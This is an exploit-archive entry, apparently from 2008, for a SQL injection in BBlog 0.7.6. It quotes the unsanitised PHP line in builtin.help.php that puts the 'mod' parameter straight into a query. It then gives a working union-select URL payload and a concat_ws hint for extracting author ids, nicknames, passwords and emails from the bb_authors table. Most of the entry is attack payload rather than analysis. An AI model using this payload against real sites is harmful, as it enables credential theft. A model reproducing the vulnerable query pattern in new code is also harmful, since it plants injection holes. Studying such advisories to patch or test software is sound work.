[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BBlog 0.7.6 (mod) Remote SQL Injection Vulnerability
# Published : 2008-08-12
# Author : IP-Sh0k
# Previous Title : gelato CMS 0.95 (img) Remote File Disclosure Vulnerability
# Next Title : Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability
#######################################################
########## BBlog 0.7.6 SQL Injection Vuln #############
#######################################################
#
# Vulnpath: /bblog_plugins/builtin.help.php
#
# Vuln: if($_GET['mod']) $pluginrow = $bBlog->get_row("select * from ".T_PLUGINS." where name='".$_GET['mod']."' and type='modifier'");
#
#
#
# PoC: ?pid=1&mod='+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+bb_authors--
#
# help: On the number you can see you have to set:
# concat_ws(0x3a,id,nickname,password,email,icq)
#
#
# Found by: IP-Sh0k
#######################################################
# www.Syue.com [2008-08-12]